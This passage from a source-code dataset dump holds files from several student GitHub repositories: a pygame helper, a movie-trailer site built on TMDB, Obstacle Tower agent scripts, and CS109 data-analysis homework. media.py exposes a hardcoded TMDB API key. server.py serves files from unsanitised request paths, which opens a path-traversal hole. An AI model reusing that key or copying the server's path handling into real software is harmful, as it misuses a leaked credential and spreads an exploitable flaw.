"text": "import pygame as pg\n\n# Board Information\nboardWidth = 600\nboardHeight = 600\nrows = 8\ncols = 8\nsqr_width = boardWidth / rows\nsqr_height = boardHeight / cols\n\n# Colors\nblack = [144, 175, 197]\nwhite = [118, 54, 38]\nyellow = [51, 107, 135]\nblue = [42, 49, 50]\n\n# Piece Information\nradius = int(3 * sqr_width / 8)\n\n\n# Adjust board location to mouse position and the opposite\ndef adjust_location(location):\n position = [0.5 * sqr_height + location[1] * sqr_height, sqr_width * 0.5 + location[0] * sqr_width]\n position[0] = int(position[0])\n position[1] = int(position[1])\n return position\n\ndef adjust_position(position):\n location = [position[1] // sqr_height, position[0] // sqr_width]\n location[0] = int(location[0])\n location[1] = int(location[1])\n return location\n\n\n# Checks if a circle was clicked\ndef clicked(position, mousePos):\n dist = ((mousePos[0] - position[0]) ** 2 + (mousePos[1] - position[1]) ** 2) ** 0.5\n if dist < radius:\n return True\n return False\n"
}
] | 12 |
arccoza/fsnd_p0_movie_trailer_website | https://github.com/arccoza/fsnd_p0_movie_trailer_website | 1b13457d3178680870527fd8251919bbff133ad4 | b72531764ad75c657940518dc17daddab84cdde9 | 65e4ce50020eeb47076fb6e9707afea374ff5812 | refs/heads/master | 2020-07-05T17:07:17.430453 | 2016-11-23T03:49:46 | 2016-11-23T03:49:46 | 73,989,099 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7419936656951904,
"alphanum_fraction": 0.756878674030304,
"avg_line_length": 45.1875,
"blob_id": "a91594754ff91170f883ca5e13f14c8493a0c0c7",
"content_id": "addad78343dca2eafaf0c76e3baed316f8aba568",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2217,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 48,
"path": "/README.md",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "# fsnd_p0_movie_trailer_website\nProject #0 of the Udacity FSND.\n\nThis project was developed for and requires python 2.7.\n\nAll development and testing was done on Linux (elementary OS 0.4 / Ubuntu 16.04), running the project under Windows was not tested, but effort was made to make sure it should run.\n\nA modern browser (IE 11 / Edge, current versions of Chrome / Firefox / Safari) is required to view the site.\n\nAn internet connection is required to access online resources.\n\n## Download and Setup\n\n### Download\nTo download this project either:\n- Clone this repo with `git clone https://github.com/arccoza/fsnd_p0_movie_trailer_website.git`\n- Or download it as an archive from [here](https://github.com/arccoza/fsnd_p0_movie_trailer_website/archive/master.zip) and unzip.\n\n### Setup\nOnce you have the project in the `fsnd_p0_movie_trailer_website` directory (or wherever you put it) setup a Python environment (optional), then install the dependencies, like so:\n\n#### Python environment (optional)\n1. From the command line in the fsnd_p0_movie_trailer_website directory, type: `virtualenv -p python2 .env`\n2. Activate the environment in this console with `source .env/bin/activate`\n\nIf you do not have **virtualenv** installed [click here](https://virtualenv.pypa.io/en/stable/installation/) for help.\n\n#### Install required packages\n- From the command line in the fsnd_p0_movie_trailer_website directory, type: `pip install -r requirements.txt`\n\nIf you do not have **pip** installed [click here](https://pip.pypa.io/en/stable/installing/) for help.\n\n## Building and Running\n\nTo access the Movie Trailers site:\n\n0. Make sure your python environment is active (optional).\n1. Build the site by running `python build.py` (this may take a moment) from the command line in the fsnd_p0_movie_trailer_website directory.\n2. Access the site by running the http server `python server.py`\n3. Open your browser to [http://localhost:8000](http://localhost:8000)\n\nIf everything worked you should see something like:\n\n<img src=\"screenshot.png\">\n\n## Usage\n\nHover over movie posters to see the **play** and **info** buttons. Click on the **play** button to view a trailer. Click on the small **info** button to read a plot overview.\n"
},
{
"alpha_fraction": 0.5893011093139648,
"alphanum_fraction": 0.6169111132621765,
"avg_line_length": 21.288461685180664,
"blob_id": "7644c754513682b9a565474b7a4e46446eb469d6",
"content_id": "a9792c17629a74c1c32d8685005c8b8b1cbe3acb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 52,
"path": "/server.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''\nRefs:\n https://gist.github.com/bradmontgomery/2219997\n'''\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer as Server\nimport os\n\n\nclass Handler(BaseHTTPRequestHandler):\n '''Handles incoming http requests.'''\n def send_200(self):\n self.send_response(200)\n # self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def send_404(self):\n self.send_error(404)\n self.end_headers()\n\n def do_GET(self):\n targets = ('', '/index.html', '/index.htm')\n path = './pub/' + self.path\n\n # Look for a file in the path provided by the request.\n for p in (os.path.abspath(path + s) for s in targets):\n try:\n with open(p, 'r') as f:\n self.send_200()\n self.wfile.writelines(f)\n return\n except IOError:\n pass\n\n # Send a 404 response if there is no file at the path.\n self.send_404()\n\n\ndef run(port=8000):\n '''\n Starts the local web server.\n\n Args:\n port (int): The port for the server to listen on.\n '''\n address = ('', port)\n httpd = Server(address, Handler)\n print('HTTP server running...')\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n run()\n"
},
{
"alpha_fraction": 0.529411792755127,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 16,
"blob_id": "6105a306386a03720993da1304bcc0a69ef91e4e",
"content_id": "2fdb7b0cceb025619460ef56aaaa0ff607a2f7b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 34,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "pystache==0.5.4\ntmdbsimple==1.4.0\n"
},
{
"alpha_fraction": 0.6573604345321655,
"alphanum_fraction": 0.6624365448951721,
"avg_line_length": 19.736841201782227,
"blob_id": "eb4a42b03c4516ce3fe6c998b6ff88fc11013524",
"content_id": "8c6fdd476f35cb90d7409ac7ae17a2bd883b3bf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 394,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 19,
"path": "/models.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''\nA collection of movie model data for the site builder.\n'''\nfrom media import Movie\n\n\nmovies = [\n Movie(title='The Fifth Element'),\n Movie(title='The Dirty Dozen'),\n Movie(title='Escape from New York'),\n Movie(title='Serenity'),\n Movie(title='Kill Bill Vol. 1'),\n Movie(title='Kill Bill Vol. 2'),\n Movie(title='Cowboy Bebop'),\n Movie(title='Porco Rosso')\n]\n\nfor m in movies:\n m.lookup()\n"
},
{
"alpha_fraction": 0.5507832169532776,
"alphanum_fraction": 0.5548256635665894,
"avg_line_length": 22.282352447509766,
"blob_id": "c69bbf90b3dc31bf5abcf2a5b54c582d6df1d700",
"content_id": "7aba251fbe881bfa9a6c2bc611064ef056132da0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1979,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 85,
"path": "/minimatch.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''A minimatch.js like globbing module.'''\nimport re\nimport fnmatch\nimport os\n\n\ndef _rng_repl(match):\n m = match.groupdict()\n return '[' + ('^' if m['neg'] else '') + m['rng'] + ']'\n\n_os_is_win = True if os.name == 'nt' else False\n_sep = '{sep}'\n_real_sep = r'\\\\' if _os_is_win else '/'\n_any = '[^' + _sep + ']'\n_evr = '[^' + _sep + ']*?'\n_dbl = '**'\n_dbl_repl = '.*?'\n_oth = [\n ('_qum', '\\?', _any),\n ('_str', '\\*', _evr),\n ('_rng', '\\[(?P<neg>[\\^!])?(?P<rng>[\\d\\w-]*?)\\]', _rng_repl)\n]\n\n\ndef _convert(pats):\n '''Takes parts of a glob pattern and converts it to a regex.'''\n for pat in pats:\n if pat == '':\n continue\n elif pat == _dbl:\n yield _dbl_repl\n continue\n for k, v, repl in _oth:\n res = re.sub(v, repl, pat)\n # print(k)\n # if res is not pat:\n # print('--' + k)\n pat = res\n yield pat\n\n\ndef _compile(glob):\n '''\n Takes a glob pattern and compiles it into a regex string,\n returns the regex string.\n '''\n regex = []\n parts = re.split('/*', glob)\n # print(parts)\n\n if _os_is_win and parts[0] == '':\n regex.append('.:')\n\n for i, part in enumerate(_convert(parts)):\n if i > 0 or parts[0] == '':\n regex.append(_sep)\n regex.append(part)\n\n if parts[-1] == '':\n regex.append(_sep)\n # print(regex)\n # This `**{_sep[1:-1]` looks funny but ensures that you can change the name\n # of the _sep var without breaking anything.\n return ''.join(regex).format(**{_sep[1:-1]: _real_sep})\n\n\ndef minimatch(path, pat):\n '''\n Takes a file path and compares it to a glob pattern,\n if there is a match it returns the match obj otherwise None.\n\n Args:\n path (str): The path to check against pat.\n pat (str): The glob pattern to test path against.\n\n Returns:\n A match object if successful, None otherwise.\n '''\n pat = _compile(pat)\n # print(pat)\n return re.match(pat, path)\n\n\n# print(minimatch('/bob/sam/foo.txt', '/**/foo.t?t'))\n# print(minimatch('c:\\\\bob\\\\sam\\\\foo.txt', '/**/foo.t?t'))\n"
},
{
"alpha_fraction": 0.6416184902191162,
"alphanum_fraction": 0.6488439440727234,
"avg_line_length": 26.68000030517578,
"blob_id": "d2ad5f50335c3a3ebc244eb0faa29054fa7beb67",
"content_id": "9057d67f2566b6edd2143a586a7d17bce069b469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1384,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 50,
"path": "/build.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''\nThis is a simple build script that walks a source directory,\ncopying, and possibly manipulating, the files to a destination directory.\n\nRefs:\n http://stackoverflow.com/questions/12517451/python-automatically-creating-directories-with-file-output\n'''\nimport pystache\nimport models\nimport os\nimport shutil\nimport errno\nfrom minimatch import minimatch\n\n\nsrc = os.path.abspath('./src')\ndest = os.path.abspath('./pub')\ndata = {'movies': models.movies}\n\n# Remove the previous build if it exists.\ntry:\n shutil.rmtree(dest)\nexcept OSError as ex:\n if ex.errno != errno.ENOENT:\n raise\n\n# Walk the src dir looking for html templates.\nfor root, dirs, files in os.walk(src):\n for f in files:\n in_path = os.path.join(root, f)\n with open(in_path, 'r') as fin:\n tail = root.split(src)[1]\n out_path = os.path.abspath(dest + tail)\n\n # If the path doesn't exist create it.\n try:\n os.makedirs(out_path)\n except OSError as ex:\n if ex.errno != errno.EEXIST:\n raise\n\n out_path += '/' + f\n print(out_path)\n with open(out_path, 'w') as fout:\n # If the file is an html file, pass it through the mustache renderer.\n if minimatch(in_path, '/**/*.html'):\n fout.write(pystache.render(fin.read(), data).encode('utf-8'))\n # Any other file is simply copied.\n else:\n fout.write(fin.read())\n"
},
{
"alpha_fraction": 0.635108470916748,
"alphanum_fraction": 0.6449704170227051,
"avg_line_length": 28.476743698120117,
"blob_id": "5a1e66f6b0b873f9946125a08bcdddf50b352113",
"content_id": "1b2aaa00bdba71cb66871cea4c695a28a5e6395b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2535,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 86,
"path": "/media.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''\nRefs:\n https://github.com/celiao/tmdbsimple\n'''\nimport tmdbsimple as tmdb\nfrom tmdbsimple import Search, Movies\nfrom pprint import pprint\nfrom requests import HTTPError\n\n\nclass Movie(dict):\n '''\n A Class that contains data about a particular movie, extends dict.\n\n '''\n def __init__(self, **kwargs):\n '''\n Inits Movie with at least the title of the movie.\n Any other data can be arbitrarily provided using named args.\n\n Args:\n title (str): named param that must be provided.\n\n Raises:\n MovieInitError: Raised if you do not provided at least the movie title.\n '''\n # Ensure keys and values are unicode.\n kwargs = {unicode(k): unicode(v) for k, v in kwargs.iteritems()}\n super(Movie, self).__init__(**kwargs)\n\n self._posters_url = 'https://image.tmdb.org/t/p/w640'\n self._videos_url = 'https://www.youtube.com/embed/'\n\n for k, v in self.iteritems():\n if k == 'title':\n return\n raise MovieInitError('You must at least provide a title.')\n\n def lookup(self):\n '''\n Looks up movie info on TMDB,\n and populates the obj with this additional data.\n\n Raises:\n MovieSearchError: If the movie could not be found\n by the title provided to init.\n '''\n try:\n res = search.movie(query=self['title'])\n res = Movies(res['results'][0]['id']).info(append_to_response='videos')\n except (IndexError, HTTPError):\n raise MovieSearchError(\n 'Could not retrieve info on movie: \"' + self['title'] + '\"')\n\n res.update(self)\n self.update(res)\n\n self[u'poster_url'] = self.get('poster_url') or self._posters_url + self['poster_path'] # NOQA\n if 'trailer_url' not in self:\n for v in self['videos']['results']:\n if(v['site'] == u'YouTube' and v['type'] == u'Trailer'):\n self[u'trailer_url'] = self._videos_url + v[u'key']\n break\n\n\nclass MovieInitError(Exception):\n '''Used to indicate a missing title arg in Movie init.'''\n def __init__(self, message, errors=None):\n super(MovieInitError, self).__init__(message)\n self.errors = errors\n\n\nclass MovieSearchError(Exception):\n '''Used when a movie cannot be found by the title arg in Movie init.'''\n def __init__(self, message, errors=None):\n super(MovieSearchError, self).__init__(message)\n self.errors = errors\n\n\ntmdb.API_KEY = '2874d8e2341ae3de760cc2119047fbb0'\nsearch = Search()\n# Movie.fetch_details('The Fifth Element')\n# m = Movie(title='The Fifth Element')\n# m = Movie([('title', 'The Fifth Element')])\n# m.lookup()\n# pprint(m)\n"
}
] | 7 |
idthanm/otc | https://github.com/idthanm/otc | ae1eac536338f823d8b97092a7b6eb311a074e11 | 697f0330186bb354f52d3f5166e01f144e9b05c2 | a5dde37ad4b6fc9de5f2fd959fec9043bf66dcf4 | refs/heads/master | 2020-05-01T00:34:32.717297 | 2019-03-28T09:46:20 | 2019-03-28T09:46:20 | 177,171,345 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7005975842475891,
"alphanum_fraction": 0.7028642296791077,
"avg_line_length": 41.561405181884766,
"blob_id": "6276e5cf22145263ee6f15f26c888aa8cb1864a6",
"content_id": "05ce2a900668fec9209f611bf5bdfcf580180ab0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4853,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 114,
"path": "/obstacle-tower-challenge/run_agent.py",
"repo_name": "idthanm/otc",
"src_encoding": "UTF-8",
"text": "from obstacle_tower_env import ObstacleTowerEnv\nimport sys\nimport numpy as np\nimport argparse\nimport dopamine.discrete_domains.create_otc_env as create_environment\nfrom dopamine.agents.dqn import dqn_agent\nfrom dopamine.agents.implicit_quantile import implicit_quantile_agent\nfrom dopamine.agents.rainbow import rainbow_agent\nfrom dopamine.discrete_domains import checkpointer\nimport tensorflow as tf\n\n\ndef initialize_checkpointer(checkpoint_dir, checkpoint_file_prefix, agent):\n \"\"\"Reloads the latest checkpoint if it exists.\n\n This method will first create a `Checkpointer` object and then call\n `checkpointer.get_latest_checkpoint_number` to determine if there is a valid\n checkpoint in self._checkpoint_dir, and what the largest file number is.\n If a valid checkpoint file is found, it will load the bundled data from this\n file and will pass it to the agent for it to reload its data.\n If the agent is able to successfully unbundle, this method will verify that\n the unbundled data contains the keys,'logs' and 'current_iteration'. It will\n then load the `Logger`'s data from the bundle, and will return the iteration\n number keyed by 'current_iteration' as one of the return values (along with\n the `Checkpointer` object).\n\n Args:\n checkpoint_file_prefix: str, the checkpoint file prefix.\n\n Returns:\n start_iteration: int, the iteration number to start the experiment from.\n experiment_checkpointer: `Checkpointer` object for the experiment.\n \"\"\"\n checkpointer_ = checkpointer.Checkpointer(checkpoint_dir,\n checkpoint_file_prefix)\n start_iteration = 0\n # Check if checkpoint exists. Note that the existence of checkpoint 0 means\n # that we have finished iteration 0 (so we will start from iteration 1).\n latest_checkpoint_version = checkpointer.get_latest_checkpoint_number(\n checkpoint_dir)\n if latest_checkpoint_version >= 0:\n experiment_data = checkpointer_.load_checkpoint(\n latest_checkpoint_version)\n agent.unbundle(checkpoint_dir, latest_checkpoint_version, experiment_data)\n\ndef create_agent(sess, environment, agent_name=None, summary_writer=None,\n debug_mode=False):\n \"\"\"Creates an agent.\n\n Args:\n sess: A `tf.Session` object for running associated ops.\n environment: A gym environment (e.g. Atari 2600).\n agent_name: str, name of the agent to create.\n summary_writer: A Tensorflow summary writer to pass to the agent\n for in-agent training statistics in Tensorboard.\n debug_mode: bool, whether to output Tensorboard summaries. If set to true,\n the agent will output in-episode statistics to Tensorboard. Disabled by\n default as this results in slower training.\n\n Returns:\n agent: An RL agent.\n\n Raises:\n ValueError: If `agent_name` is not in supported list.\n \"\"\"\n assert agent_name is not None\n if not debug_mode:\n summary_writer = None\n if agent_name == 'dqn':\n return dqn_agent.DQNAgent(sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n elif agent_name == 'rainbow':\n return rainbow_agent.RainbowAgent(\n sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n elif agent_name == 'implicit_quantile':\n return implicit_quantile_agent.ImplicitQuantileAgent(\n sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n else:\n raise ValueError('Unknown agent: {}'.format(agent_name))\n\n\ndef run_episode(initial_observation, env, agent):\n is_terminal = False\n episode_reward = 0.0\n action = agent.begin_episode(initial_observation)\n \n while not is_terminal:\n observation, reward, is_terminal, _ = env.step(action)\n action = agent.step(reward, observation)\n episode_reward += reward\n \n return episode_reward\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('environment_filename', default='../ObstacleTower/obstacletower', nargs='?')\n parser.add_argument('--docker_training', action='store_true')\n parser.set_defaults(docker_training=False)\n args = parser.parse_args()\n\n env = create_environment.create_otc_environment(environment_filename=args.environment_filename,\n docker_training=args.docker_training, realtime_mode=True)\n sess = tf.Session('', config=tf.ConfigProto(allow_soft_placement=True))\n agent = create_agent(sess=sess, environment=env, agent_name='rainbow')\n initialize_checkpointer(\"..\\\\checkpoints\", 'ckpt', agent)\n\n\n while True:\n initial_observation = env.reset()\n episode_reward = run_episode(initial_observation, env, agent)\n print(\"Episode reward: \" + str(episode_reward))\n\n"
},
{
"alpha_fraction": 0.6838235259056091,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 20,
"blob_id": "d8250e37693ae719d20f2bf61f69f87247ea89ac",
"content_id": "4c50f4b3786527c5163cf37aa210c42796ce05ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 13,
"path": "/test.py",
"repo_name": "idthanm/otc",
"src_encoding": "UTF-8",
"text": "from obstacle_tower_env import ObstacleTowerEnv\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nimport numpy as np\nim = Image.open('1.jpg')\n\n# a = np.random.random((84, 84, 3))\nim_arr = np.array(im)\nb = im.convert('L')\nb_ = np.array(b)\n\nplt.imshow(a)\nplt.show()"
},
{
"alpha_fraction": 0.6851851940155029,
"alphanum_fraction": 0.6851851940155029,
"avg_line_length": 53.33333206176758,
"blob_id": "4f841fcb540020e578e5fff6fc6116725a50b33d",
"content_id": "1732f817dbec802083badd5c91328cb6a236827d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 3,
"path": "/debug.py",
"repo_name": "idthanm/otc",
"src_encoding": "UTF-8",
"text": "import subprocess\n\nsubprocess.call(['python', '-um', 'dopamine.discrete_domains.train', '--base_dir=.', '--gin_files=.\\\\dopamine\\\\agents\\\\dqn\\\\configs\\\\dqn.gin'])"
}
] | 3 |
xieqihui/CS109 | https://github.com/xieqihui/CS109 | ba45e11bfdf5ce0696113c8642404decc3fca8fa | 0594a1896bddf2aafa6197f93b7e6565b6152ea6 | ea72732d659fa4789ec17c578c6b9f1c6d3189ab | refs/heads/master | 2016-09-10T17:17:59.680368 | 2016-06-15T06:58:29 | 2016-06-15T06:58:29 | 58,844,053 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6354343891143799,
"alphanum_fraction": 0.690800666809082,
"avg_line_length": 33.47058868408203,
"blob_id": "3b41c19f96ce82781e957a4a3b328452d30d2985",
"content_id": "c367e799964d5d75a12e87a2f0ebc17d29348be7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1174,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 34,
"path": "/src/HW2_P2.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 2, 2016\n\n@author: xieqihui\n'''\nimport numpy as np\nimport pandas as pd # pandas\nimport matplotlib.pyplot as plt # module for plotting \nimport datetime as dt # module for manipulating dates and times\nimport numpy.linalg as lin # module for performing linear algebra operations\nfrom scipy.stats import norm\nelection = pd.read_csv(\"../Data/2012-general-election-romney-vs-obama.csv\")\n#print election.head()\n\n###Problem 2(b)\nelection.loc[:, 'Start Date'] = pd.to_datetime(election.loc[:, 'Start Date'])\nelection.loc[:, 'End Date'] = pd.to_datetime(election.loc[:, 'End Date'])\npollNov2012 = election[(election['Start Date'] >= pd.Timestamp('2012-11-01')) & (election['Start Date'] <= pd.Timestamp('2012-11-30'))]\nM = pollNov2012.shape[0]\nN = pollNov2012['Number of Observations'].median()\n#print pollNov2012\n\n### Problem 2(c)\np = np.random.binomial(N,0.53)\nsample = np.random.random([1000,N])\n#print sample\nObama = [sum(s <= 0.53) / float(N) for s in sample]\nmu, std = norm.fit(Obama)\nprint \"mu: \" + str(mu) + \" std: \" + str(std)\nfig, ax1 = plt.subplots()\nax1.hist(Obama, bins = 50)\nx = np.linspace(0,1,1000)\nax1.plot(x, norm.pdf(x, mu, std))\nplt.show()\n\n\n"
},
{
"alpha_fraction": 0.7179487347602844,
"alphanum_fraction": 0.7948718070983887,
"avg_line_length": 37.5,
"blob_id": "a129c2ab14ee582801630ad73cdaf0ae8d7ac280",
"content_id": "f84ae80a2e905781b12097eb3e3a18b4591affee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 78,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 2,
"path": "/README.md",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "# CS109\nSolutions to the homeworks in the Harvard CS109 Data Science course. \n"
},
{
"alpha_fraction": 0.6424763202667236,
"alphanum_fraction": 0.6596564054489136,
"avg_line_length": 36.5,
"blob_id": "26ca09b055240695c8c337d8a4ecd158420acc48",
"content_id": "5cdc74562c3a015760f802b98b4738a0979accaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3376,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 90,
"path": "/src/P3.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 16, 2016\n\n@author: xieqihui\n'''\nfrom scipy.stats import norm\nfrom P2 import *\n\npopulation = pd.read_excel(\"../Data/indicator gapminder population.xlsx\", \"Data\")\npopulation.index = population[population.columns[0]]\npopulation.drop(population.columns[0], axis=1, inplace=True)\npopulation = population.T\n\ndef ratioNormals(diff, a):\n P_x = 1 - norm.cdf(a, loc=diff)\n P_Y = 1 - norm.cdf(a, loc=0)\n return(P_x/P_Y)\n\ndef prob_3a():\n diff = np.linspace(0,10,100)\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n for a in np.arange(2,6,1):\n ratio = ratioNormals(diff, a)\n ax.plot(diff,ratio, label = 'a= %d' %a)\n plt.xlabel(\"diff\")\n plt.ylabel(\"ratio\")\n plt.yscale('log')\n plt.ylim(0,10**8)\n ax.legend(loc='upper left')\n fig.tight_layout()\n plt.show()\n\ndef ratioCountries(groupedData, a):\n prop = [len(group.Income[group.Income >=a]) /float(len(group.Income.dropna())) for key, group in groupedData]\n z = pd.DataFrame(groupedData.mean().index, columns = ['Region'])\n z['Mean'] = np.round(groupedData.mean().values,2)\n z['P(X > %d)' % a] = np.round(prop, 4)\n return z\n\ndef prob_3b():\n year = 2012\n df = mergeByYear(year).groupby('Region')\n df_ratio = ratioCountries(df, 1e4)\n df_ratio = df_ratio[(df_ratio.Region == 'ASIA') | (df_ratio.Region == 'SOUTH AMERICA')]\n print df_ratio\n\ndef mergeByYearPop(year):\n incomeByYear = mergeByYear(year)\n popByYear = pd.DataFrame(population.loc[year].values, columns=['Population'])\n popByYear['Country'] = population.columns\n incomeByYearPop = pd.merge(left=incomeByYear, right=popByYear, how='inner', on='Country')\n incomeByYearPop['SumIncome'] = incomeByYearPop['Income'] * incomeByYearPop['Population']\n #incomeByYearPop['AdjustedIncome'] = incomeByYearPop['Income'] * incomeByYearPop['Population'] / float(totpop)\n return incomeByYearPop\n\ndef adjustIncome(df):\n totpop = df.sum()['Population']\n df['AdjustedIncome'] = df['Income'] * df['Population'] / float(totpop)\n df['AdjustedIncome'] = np.round(df['AdjustedIncome'], 2)\n return df\n\ndef adjustRatioCountries(groupedData, a):\n prop = [sum((group.Income >= a) * group.Population)/float(group.Population.sum()) for key, group in groupedData]\n z = pd.DataFrame(groupedData.mean().index, columns = ['Region'])\n z['P(x > %d)' % a] = np.round(prop, 4)\n return z\n\ndef prob_3d():\n df = mergeByYearPop(2012)\n adjustedData = df.groupby('Region').apply(adjustIncome)\n adjustedData[(adjustedData.Region == 'ASIA') | (adjustedData.Region == 'SOUTH AMERICA')].boxplot('AdjustedIncome', by='Region')\n plt.ylabel('Adjusted Income')\n plt.yscale('log')\n plt.show()\n #print adjustedData.head()\n\n \n regionAverage = adjustedData.groupby('Region').sum() \n regionAverage.Income = np.round(mergeByYear(2012).groupby('Region').mean().Income,2)\n \n df_ratio = adjustRatioCountries(df.groupby('Region'), 10000)\n df_ratio['AdjustedIncome'] = regionAverage['AdjustedIncome'].values\n df_ratio['OriginalIncome'] = regionAverage['Income'].values\n \n #regionAverage['Average Income'] = np.round(regionAverage['SumIncome'].values / regionAverage['Population'].astype(float).values,2)\n print df_ratio[(df_ratio.Region == 'ASIA') | (df_ratio.Region == 'SOUTH AMERICA')]\n \nif __name__ == '__main__':\n prob_3d()\n\n"
},
{
"alpha_fraction": 0.5764706134796143,
"alphanum_fraction": 0.6086687445640564,
"avg_line_length": 29.075471878051758,
"blob_id": "2369fd6677fb78debb5c18d0e7071f6b29e0d33d",
"content_id": "d1b2001328d68b7ee415dffd5f78344a31e3f685",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1615,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 53,
"path": "/src/P2.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 13, 2016\n\n@author: xieqihui\n'''\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncountries = pd.read_csv(\"../Data/countries.csv\")\nincome = pd.read_excel(\"../Data/indicator gapminder gdp_per_capita_ppp.xlsx\", \"Data\")\nincome.index = income[income.columns[0]]\nincome.drop(income.columns[0], axis=1, inplace=True)\nincome = income.T\n# print income.head()\n \n\ndef mergeByYear(year):\n incomeByYear = pd.DataFrame(income.loc[year].values, columns=['Income'])\n incomeByYear['Country'] = income.columns\n incomeByYear = pd.merge(left=incomeByYear, right=countries, \\\n how='inner', on='Country')\n incomeByYear = incomeByYear[['Country', 'Region', 'Income']]\n return incomeByYear\n\ndef plotData():\n global income\n global countries\n \n yr = 2000\n fig, ax = plt.subplots(1, 1)\n ax.hist(income.loc[yr].dropna())\n ax.set_title(\"Distribution of income in %d\" % yr)\n ax.set_xlabel(\"Income per person\")\n ax.set_ylabel(\"Number of countries\")\n ax.set_xlim((min(income.loc[yr].dropna()), max(income.loc[yr].dropna())))\n \n print mergeByYear(2010).head()\n fig = plt.figure(figsize=(16,12))\n for yr in np.arange(1950,2010,10):\n ax = fig.add_subplot(2,3,(yr - 1950 + 10)/10)\n df = mergeByYear(yr)\n df.boxplot('Income', by = 'Region', ax = ax, rot = 90)\n plt.title(\"Year: \" + str(yr))\n plt.ylabel('Income')\n plt.ylim(10**2, 10.5 **5)\n plt.yscale('log')\n \n fig.tight_layout()\n plt.show()\n \nif __name__ == '__main__':\n plotData()\n \n \n\n\n\n\n\n \n\n"
},
{
"alpha_fraction": 0.6969696879386902,
"alphanum_fraction": 0.7214247584342957,
"avg_line_length": 34.433963775634766,
"blob_id": "b0ec202baa193d80f4de16bbd1755e61ebb3d226",
"content_id": "81c12963b236e29fe43ccab212368d64b0d35eb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1881,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 53,
"path": "/src/HW1_P1.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
